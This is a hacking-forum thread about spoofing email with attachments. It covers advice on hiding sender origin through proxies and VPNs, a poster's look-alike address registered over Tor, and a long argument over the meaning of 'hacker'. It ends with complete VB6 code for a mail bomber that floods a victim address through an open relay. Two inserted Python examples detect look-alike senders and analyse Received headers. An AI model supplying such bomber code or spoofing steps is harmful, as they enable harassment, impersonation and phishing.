
Spoofed Email With Attachment


power


You could script your own PHP mailer and attachments using base-64 encoding for inline message attachments, but you would need a server to upload and run the PHP script from. Doing it from your own domain gives away that it was you, since email headers default to the server or host it's run from. They can be spoofed if run from a VM running DNS locally as a service and then forwarded out over a proxy or VPN service, but any way you slice it, it's pretty much nefarious black hat stuff, so you do what you want at your own risk. I don't have a problem discussing how to do those things legal or illegal, since knowledge is not a crime, but it's on you if you go that route. Using other people's servers and open mail relays is also illegal in some parts of the world and you can be fined or arrested under fraud and computer abuse laws, depending on where you are from and if someone wanted to press charges. Spammers do go to jail sometimes, but you would have to be like famous ones who send a shit ton of spam worldwide, like the spam king(s) http://en.wikipedia....Eddie_Davidson. (There have been numerous people fined and served jail time for this sort of stuff).

http://en.wikipedia.org/wiki/Spam_King

http://en.wikipedia.org/wiki/List_of_spammers

Edited by digip

Thanks for both replies. They are both going to be useful in the future I'm sure, although I was hoping for a simpler (under 5 minute) solution. I kind of found one.

What I ended up doing was instead of spoofing the email addy that was like "HTMNPaint@hotmail.com" I registered "HTNMPaint@hotmail.com" via a patched copy of Tor and went that route.

Thanks for the legal side notes, Digip. At the end of the day I agree with you that this is just talk and it's a hacking forum so hopefully most of the topics, like all your Jasager goodness, are going to be very black hat and potentially wildly illegal if any of us were actual hackers who used these tools instead of just the law abiding, government loving, celibate, big brother supporting developers who only post online and never really hack, like we all are.

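Added example, not part of the thread or any poster's code: a look-alike registration like the one described above (two adjacent letters swapped in the local part) is something a mail filter can catch by comparing incoming senders against known contacts with an edit distance that counts an adjacent swap as a single edit. The contact list, the distance threshold and the function names are assumptions for illustration.

```python
from email.utils import parseaddr

# Constructed allow-list; the address is the one quoted in the thread.
KNOWN_CONTACTS = ["HTMNPaint@hotmail.com"]


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute and
    swapping two adjacent characters each cost one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent swap
    return d[len(a)][len(b)]


def split_address(raw):
    """Return (local, domain) in lower case from a From-style header value."""
    addr = parseaddr(raw)[1].lower()
    local, _, domain = addr.rpartition("@")
    return local, domain


def classify(raw_sender, known_contacts=KNOWN_CONTACTS, max_dist=2):
    """Return (verdict, matched_contact): known, lookalike, unknown or unparseable."""
    local, domain = split_address(raw_sender)
    if not local or not domain:
        return ("unparseable", None)
    known = {"@".join(split_address(c)) for c in known_contacts}
    sender = local + "@" + domain
    if sender in known:
        return ("known", sender)
    best = None
    for contact in sorted(known):
        c_local, _, c_domain = contact.rpartition("@")
        # Score local part and domain separately so either can be the near-miss.
        dist = osa_distance(local, c_local) + osa_distance(domain, c_domain)
        if dist <= max_dist and (best is None or dist < best[0]):
            best = (dist, contact)
    return ("lookalike", best[1]) if best else ("unknown", None)


if __name__ == "__main__":
    samples = [  # constructed sender values
        '"HTMN Paint" <HTNMPaint@hotmail.com>',
        "HTMNPaint@hotmail.com",
        "htmnpaint@hotmai1.com",
        "someone@hotmail.com",
    ]
    for s in samples:
        print(s, "->", classify(s))
```

A plain Levenshtein distance scores the swapped pair as two edits; counting it as one lets the threshold stay tight enough to avoid flagging unrelated short addresses.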

I don't own a Pineapple, nor do I see Jasager as a strictly blackhat tool either (nor is it mine - that's Darren, DigiNinja, Mubix and many others who contributed to building that tool). It has a purpose, how you use it is up to you though. Same with the ability to spoof mail, such as replying to a potential threat or phishing scam, you would want to be able to hide your home IP and info from the email headers in the event it was sent to you only to get you to reply and then attack you. Most email clients send back your IP from your home location, regardless of what tools you use to spoof with, which is why using a third party site and script, as well as VPN or layers like TOR comes in handy ;)

The internet isn't just a two way street. It has many sidewalks and alleys, overpasses and tunnels, and off beaten paths to get from point A to point %00.

Edited by digip
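Added example, not from the thread: what the headers discussed above look like to the person reading them. It walks the Received chain of a constructed message, separates the hop recorded by the recipient's own servers from the unverified hops beneath it, and compares the From domain with the envelope (Return-Path) domain. Host names, IPs (documentation ranges) and the trusted-receiver list are assumptions, and the alignment check is a simplification of DMARC-style alignment.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message: documentation IP ranges and example domains only.
RAW = """\
Return-Path: <bounce@mailer.example.net>
Received: from mx.example.com (mx.example.com [203.0.113.10])
    by inbox.example.com with ESMTP id A1; Tue, 02 Jan 2024 10:00:05 +0000
Received: from webhost7.example.net (webhost7.example.net [198.51.100.23])
    by mx.example.com with ESMTP id B2; Tue, 02 Jan 2024 10:00:02 +0000
Received: from [192.0.2.44] (unknown [192.0.2.44])
    by webhost7.example.net with HTTP; Tue, 02 Jan 2024 10:00:00 +0000
From: "Paint Shop" <sales@paintshop.example>
To: user@example.com
Subject: Invoice attached

See attachment.
"""

# Assumption: hosts the recipient's organisation runs and therefore trusts.
TRUSTED_RECEIVERS = {"inbox.example.com", "mx.example.com"}

HOP_RE = re.compile(
    r"from\s+(\S+)\s+\([^)]*?\[([0-9A-Fa-f.:]+)\]\).*?\bby\s+(\S+)", re.S)


def hops(msg):
    """Parse Received headers, newest first (the order they appear in)."""
    out = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(value)
        if m:
            out.append({"from": m.group(1), "ip": m.group(2),
                        "by": m.group(3).lower()})
    return out


def domain_of(header_value):
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def aligned(a, b):
    """Simplified alignment: same domain, or one is a subdomain of the other."""
    return bool(a and b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def analyse(raw, trusted_receivers=TRUSTED_RECEIVERS):
    msg = message_from_string(raw)
    chain = hops(msg)
    # Only hops written by our own servers are reliable. Walk down from the
    # newest header; the last trusted hop names the outside host that
    # connected to us. Everything below it is supplied by the sender.
    boundary_ip = None
    for hop in chain:
        if hop["by"] not in trusted_receivers:
            break
        boundary_ip = hop["ip"]
    from_dom = domain_of(msg["From"])
    env_dom = domain_of(msg["Return-Path"])
    return {
        "path": [h["ip"] for h in reversed(chain)],   # travel order
        "boundary_ip": boundary_ip,                   # verified by our MTA
        "claimed_origin_ip": chain[-1]["ip"] if chain else None,  # unverified
        "from_domain": from_dom,
        "envelope_domain": env_dom,
        "aligned": aligned(from_dom, env_dom),
    }


if __name__ == "__main__":
    for key, value in analyse(RAW).items():
        print(f"{key}: {value}")
```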

Right, exactly (except I did think you had a Pineapple, I was confusing you with digininja). These things almost all have legitimate uses, and as far as those that don't (what's the whitehat use of Karma again?) or in terms of why we want to understand how hackers hack, it's all just pure intellectual curiosity. I agree completely, although I expected that this would be taken as a given on a hacking forum.


The pineapple is basically Karma on the FON, or at least, that's what the original idea was. It's grown well beyond that with a number of other tools on the device. The point is, the tool itself is in itself just that. Pentesters and people hired to test and penetrate networks, law enforcement, government agencies, military, have practical uses for tools like this. So do criminals, and attackers.

Let it be known, I stand strongly by what I consider the difference between a hacker, and a criminal. People like Tesla, Ben Franklin, Steve Wozniak, they are what I consider true hackers. They invented, tinkered, experimented, and learned how to make things we all use today, but also how to manipulate them, better them, etc. Although hackers and criminals both may know how to do the same thing, and have similar skills, but in my eyes and in my heart, hackers build stuff, invent, and in general, make the world a better and safer place. They are the ones looking to save us from attacks by finding and exposing flaws in the system and are often the ones writing the patches or telling us how to fix them, and half the reasons tools like this are invented, to learn about weaknesses in protocols, or to say, make something better out of what was initially some mediocre thing, tinker, learn, experiment and improve or find its flaws.

The criminal and attacker, is the person who uses those skills for ill gotten gains, has no moral standard, could care less about who they hurt, and only cares about what they want out of it. They are the ones who could care less about the innocent involved, ie: Some who have tarnished the original meaning of what Anonymous stood for, which was to fight corruptions, they for the most part today are that corruption, and the ones who break into networks and then expose innocent users' credit cards, personally identifiable information, doing it "for the lulz" or sell it to the highest bidder on the black market. I don't consider them true hackers, just because they have the same knowledge as the rest of the hackers out there. A man in a shopping mall with a gun is not a police officer, just because he knows how to shoot people with a gun. I only consider them criminals, and you have to take a stance at making the distinction between the two, because it doesn't matter if someone with a hunting license, can carry a gun and shoot with it, it matters if that person becomes a nut and decides to kill someone with it. That's a metaphor, but I think illustrates where I stand on what I consider a hacker, and a criminal. Skill sets may be the same, but one uses their skill for good, the other, criminal activity. Not all hackers who've been arrested in my mind, are criminals. It's a media driven, FUD campaign, that labels far and wide that "hacker" in and of itself is synonymous with "criminal" and the public at large follows in that same fear mongering and perpetuates the wrong perception and true ideals of what I consider to be a hacker.

With regard to Karma and the Pineapple, using one in your own home, also has a use for protecting your network, or to identify people who might also be attacking your own, regular wireless access point. Again, it's a tool. How and what you do with those tools defines who and what you are, but knowledge in and of itself, is not a crime, only your actions and what you do with that information is. Is the pineapple a fun toy for the novice hacker who might want to do some tomfoolery, sure, but so long as you aren't using it to steal people's data or break into networks you were not given permission to be on, I have no problem with it. It's when you use it for illicit, unlawful purposes that break the law that you've crossed the line from being the curious hacker, to the person with a criminal intent and agenda to use it for their own personal gain that makes you a criminal, and no longer a hacker.

Edited by digip

I appreciate your reply...does every thread get such a long legal debate?

"People like Tesla, Ben Franklin, Steve Wozniak, they are what I consider true hackers."

How about Kevin Mitnick? People like Steve Wozniak, Snubs, and Darren consider him the iconic hacker and he was pure black. How about Captain Crunch, the Roscoe Gang and actual hackers, not historical figures who never heard the term? Mitnick has even been on hak5.

Why don't you see what your friend Steve Wozniak has to say about that bad criminal Kevin Mitnick in the forewords to Mitnick's books? He loves him. That's what a hacker is to Wozniak, to me, and to most normal non-delusional individuals. Wozniak even painted a hilarious hacker-behind-bars picture for Mitnick... but you say Mitnick was *NOT* a hacker *because* he illegally hacked companies? LOL come off your high horse, man...

"With regard to Karma and the Pineapple, using one in your own home, also has a use for protecting your network"

Uh... not really. You are familiar with what the Pineapple is? Have you seen Darren's eBook on how to eavesdrop, dump data, penetrate, etc? You realize that Karma lies to people who are not you to pretend to be their networks?

"Is the pineapple a fun toy [sic] for the novice hacker who might want to do some tom foolery, sure, but so long as you aren't using it to steal peoples data or break into networks you we're not given permission to be on, I have no problem with it. Its when you use it for illicit, unlawful purposes that break the law that you've crossed the line from being the curious hacker, to the person with a criminal intent and agenda to use it for their own personal gain that makes you a criminal, and no longer a hacker."

I say this with no ill-intent and I'm sure you're a great guy :) , but I think you're just being delusional and holier-than-thou [in this thread] to the point that it's ridiculous. I have no idea how I got so lucky as to inspire this legal/ethical debate, I just wanted to know how to spoof an e-mail with an attachment; it seems pretty straight-forward and no different morally, ethically, or legally than any of the other hacking techniques being discussed. Frankly, I think maybe a bug crawled up your leg and you decided to take it out on me. I won't hold it against you.

Given your last statement that if someone hacks into a network/something without authorization they're not hackers (pretending that it's not obvious that such "criminals" are the inspiration for this website, forum, and hacking culture in general) let's now look at the Merriam-Webster dictionary definition of the word hacker:

": a person who illegally gains access to and sometimes tampers with information in a computer system "

OK, now the Oxford English Dictionary:

"Definition of hacker

noun

person who uses computers to gain unauthorized access to data."

As I said what feels like about a dozen times in earlier posts, I myself would never hack, but if I ask a question about how to hack in a hacking forum I don't see why you come at me with tons of legal warnings, arguments, and moral attacks on hackers, who you say aren't hackers if they illegally hack. Jeeze... I also wonder why you don't bring your legal zeal to every other thread instead of just mine.

Edited by power

Woah, woah woah...I was responding to your post first off and offering up my perspectives. Didn't know it was a crime to have an opinion or to be a critical thinker. (I also tend to make lengthy posts. That's just who I am.)

Sorry you don't like answers that don't give you only what you want, but that's not how communication works. Much of what people say no one wants to hear, but I am not here to preach to the choir or change who you are, or try to attack you.

"People like Steve Wozniak, Snubs, and Darren consider him the iconic hacker and he was pure black."

Do you know Kevin personally? You seem to be such an "expert" on him, as if all the man has ever done was to hurt or destroy places he hacked into. Did he break the law? Absolutely. He also served time in solitary for years because someone told the judge he could whistle nuclear launch codes into a phone to start WWIII. Come off my high horse? Really? lol

I'm not on my "high horse", and Kevin, while he did break some laws and spent many years in solitary for what amounted to a few thousand dollars in fines when all was said and done, he was by and large made an example of in the media and Hollywood as the "world's most wanted hacker" for things that are largely myth and much more importantly, far from ill intent with respect to what we see today with attacks on networks. Kevin is a genuinely nice person, and far from a hardened criminal nor do I think he's of the same ilk as those selling credit cards and working the blackhat scene only to do harm for their own gain. I've also met him, (and several times was going to be creating new websites for him, which just didn't work out to schedules and other personal issues none of anyone's business, but anyway) and while I don't know him on some deeply personal level about everything he's been through in his life, Kevin is one of the people EVERYONE uses as an example of the term "hacker == criminal". While he is skilled at hacking, he is also one of the world's foremost experts on Social Engineering, which is largely what made up most of his skills that he still uses today. He's paid his dues, served his time in jail, and now works lawfully to help protect people's networks, because he knows how to break into them, and also knows how to help people protect them.

"You realize that Karma lies to people who are not you to pretend to be their networks?"

Yup. Just like the pineapple can do. So what's your point there? Does Back|Track NOT have a lot of tools to do illegal, illicit things? It's a tool. A hammer is a tool. Until I hit someone over the head with it, it's still just a tool. Writing books or manuals on how to hack, how to use the Pineapple, that's called knowledge, and also free speech. I could write books on how to build bombs, and while it would have a hard time being printed and sold (ie: anarchists cookbook) it's not illegal to know how to do things or even do them, it's how and what you do with them that determines where the lines are crossed.

"I have no idea how I got so lucky as to inspire this legal/ethical debate"

Sorry you feel some personal attack on yourself by my responses. I get that a lot. People might just need to step back and re-read the threads, but I didn't know it was some kind of attack on you, or a debate, or that people didn't have a right to reply their thoughts on a subject and where they stand, for themselves. You do what you want on your own, I could care less and was only making points, not attacking you or trying to "preach" the gospel. You obviously took this as some sort of attack on yourself, or you wouldn't have gotten your panties in a bunch over the entire thing. I can troll people, and I do it a lot, but seriously, this was not one thread where I was trying to or intended to offend or troll someone. You did that to yourself.

let's now look at the Merriam-Webster dictionary definition of the word hacker:

": a person who illegally gains access to and sometimes tampers with information in a computer system "

OK, now the Oxford English Dictionary:

"Definition of hacker

noun

person who uses computers to gain unauthorized access to data."

Now THERE is a topic for true debate, and we've got PLENTY of people on the forums with opinions on this, and many threads discussing it already. Feel free to search and reply to those as well. I welcome a good talk about the topic.

This is by and large a matter of opinion though, and mainstream media, including the "Merriam-Webster dictionary" and "Oxford English Dictionary" can print whatever the hell they want. Just like Hollywood has romanticized the whole hacker term making kids everywhere want to be l337 haxors thinking it's like it is in the movies when in reality it's some frustrated coder or hardware tinkerer trying to work on the same thing for weeks on end to make it do what they want.

Media and news outlets like Fox and New York Times turn it into every "hacker" is a criminal by default. They are not. Hackers are people too, people who test, design, invent, and make this world a better place. We have a difference of opinions on what the term hacker means to each of us, but you sir can take it however you like. I've stated before on the forums, and many know this, I could care less what people think of me, their opinions of me, and as such, I only call it how I see it from my perspective and what it means to me.

There is no legal debate here though, nor some attack on you and whatever the hell you want to do with whatever it is you want to do, nor did I attack you in any way shape or form. You planted that seed in your own head. It would seem you feel that way though from your reply. I sense a bit of hostility, sarcasm, and sheer wtf'ism but I can't change how YOU feel, but I will be damned if I'm going to be told how I'm supposed to look at the term "Hacker" and somehow care what someone else's opinion of it is. Many of us have strong opinions on what a hacker is, there are numerous threads on this forum about the same thing, some who support my view, some who don't and for the most part many who've given up on even trying to get the word out about what they feel a hacker is.

"I also wonder why you don't bring your legal zeal to every other thread instead of just mine."

I'm not a lawyer, but if you've been on the forums and read EVERYTHING I've ever written (check my post count and when I registered, I've been here a while, I get this a lot from people all the time), I get into the same kinds of dialogs with people all the time accusing me of attacking them or taking some sort of "legal" stance. I truly could give a flying fuck what you do with whatever you learn on these or any other forums, sites, books, etc. No love lost here, don't take it personally, but you can be angry at me if you want, has nothing to do with me, but whatever, up to you on how YOU see it.

I enjoy a good dialog on various topics I have my own opinions about. It's a forum, where people are going to say things that make you uncomfortable. Apparently I have. I make no apologies for anything I said though, because I don't feel I've attacked you in any way shape or form. I've not accused you of anything in this thread topic, I've not attacked you on anything in this topic, and I'm entitled to make my posts and replies as long as I feel they need to be. TLDR, I don't really care.

Sometimes when people write stuff in replies, it's not all about you, but maybe just different key things touched upon in the thread. Taking it as personal attack, is something you did yourself, but that's on you and your perspective, I can't change how you feel. Only thing I can say is, hope you wake up feeling better tomorrow knowing that sometimes things people say, are not all about YOU, nor is everyone out to get you or put you down in a thread. These are just statements or general opinions. If I was attacking you, I'd come right out and tell you or chew you out personally.

Seriously, have a nice day, move on. Not worth working yourself up over.

By the way, this is the Internet. Get used to it.

=) Cheers.. [_])

Edited by digip

The "evil hackers" are the ones like Assange, these entitled kids with this new age whistle blower mentality who think they're one of a kind. These kids endanger the lives of the people who protect their upper middle class existences, and not for money, but just to laugh as it happens.

Back to the topic... sending spoofed emails w/attachments isn't that difficult if you know a scripting language. Google 'perl smtp tutorial' or 'c++ smtp tutorial' or whatever language you use and you'll find tons of code that you can easily and quickly edit to your liking.


Here are some things to read on in regards to the OP.

http://www.ietf.org/rfc/rfc0821.txt

http://www.gentle.it/alvise/smtp.htm

Here was the code I used with an Open Relay mail server back in the day for an email/text message bomber.

This was done in VB6 a LOOOONG time ago. This does not address your attaching of a file though.


[CODE]
Option Explicit
Dim CaseNum As Integer
Dim Victim As String
Dim Message As String
Dim VarEmail As String
Dim SentSMTP As Integer
Dim SMTPLimit As Integer
Dim Running As Boolean
'-----------------------------------------------------------------------------------
Private Sub Cmd_Start_Click()
DoEvents
Victim = txtVic.Text
Message = txtMsg.Text
SMTPLimit = txtLimit.Text
VarEmail = txtFrom.Text
cmd_Start.Enabled = False
cmd_Stop.Enabled = True
Running = True
txtFrom.Enabled = False
txtVic.Enabled = False
txtMsg.Enabled = False
txtLimit.Enabled = False
txtLog.Text = ""
WS.Close
WS.Connect
End Sub
'-----------------------------------------------------------------------------------
Private Sub cmd_Stop_Click()
WS.Close
Running = False
cmd_Start.Enabled = True
cmd_Stop.Enabled = False
txtFrom.Enabled = True
txtVic.Enabled = True
txtMsg.Enabled = True
txtLimit.Enabled = True
CaseNum = 1
txtFrom.SetFocus
End Sub
'-----------------------------------------------------------------------------------
Private Sub CmdInfo_Click()
Form1.Hide
Form2.Show
End Sub
'-----------------------------------------------------------------------------------
Private Sub cmdReset_Click()
SentSMTP = 0
txtFrom.Text = "_Pwn@ownage.com"
txtVic.Text = "Victim@domain.com"
txtMsg.Text = "Fuck You!"
txtLog.Text = "Data Log"
lblSent.Caption = "0"
txtLimit.Text = "200"
End Sub
'-----------------------------------------------------------------------------------
Private Sub Form_Load()
Running = True
CaseNum = 1
End Sub
'-----------------------------------------------------------------------------------
Private Sub Form_Unload(Cancel As Integer)
End
End Sub
'-----------------------------------------------------------------------------------
Private Sub WS_DataArrival(ByVal bytesTotal As Long)
DoEvents
Dim RecvData As String
Dim Buffer As String
WS.GetData RecvData
Buffer = Buffer + RecvData

DoEvents
Do
Select Case CaseNum
Case 1
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "220") Then
CaseNum = 2
WS.SendData "MAIL FROM:<" & SentSMTP & VarEmail & ">" & vbCrLf
End If
Buffer = ""
Case 2
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "553") Then
MsgBox Buffer, vbOKOnly, "Domain Error!"
cmd_Stop_Click
Exit Sub
End If
DoEvents
If InStr(1, Buffer, "250") Then
CaseNum = 3
WS.SendData "RCPT TO:<" & Victim & ">" & vbCrLf
Buffer = ""
End If
Case 3
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "250") Then
CaseNum = 4
WS.SendData "DATA" & vbCrLf
Buffer = ""
End If
''''''''''''''''''''' Add TO:email@domain.com
''''''''''''''''''''' Add FROM:email@domain.com
''''''''''''''''''''' Add SUBJECT:test

Case 4
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "354 Ok Send data ending with <CRLF>.<CRLF>") Then
CaseNum = 5
WS.SendData Message & SentSMTP & vbCrLf
Buffer = ""
End If
Case 5
DoEvents
txtLog.Text = txtLog.Text + Buffer
CaseNum = 6
WS.SendData "." & vbCrLf
SentSMTP = SentSMTP + 1
lblSent.Caption = SentSMTP
Case 6
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "250") Then
CaseNum = 7
WS.SendData "QUIT" & vbCrLf
CaseNum = 7
End If
Buffer = ""
Case 7
DoEvents
CaseNum = 1
End Select
Loop Until CaseNum = 7
If SentSMTP >= SMTPLimit Then
cmd_Stop_Click
Exit Sub
End If
Cmd_Start_Click
End Sub
'-----------------------------------------------------------------------------------
Private Sub WS_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
CaseNum = 1
WS.Close
WS.Connect
End Sub
[/CODE]
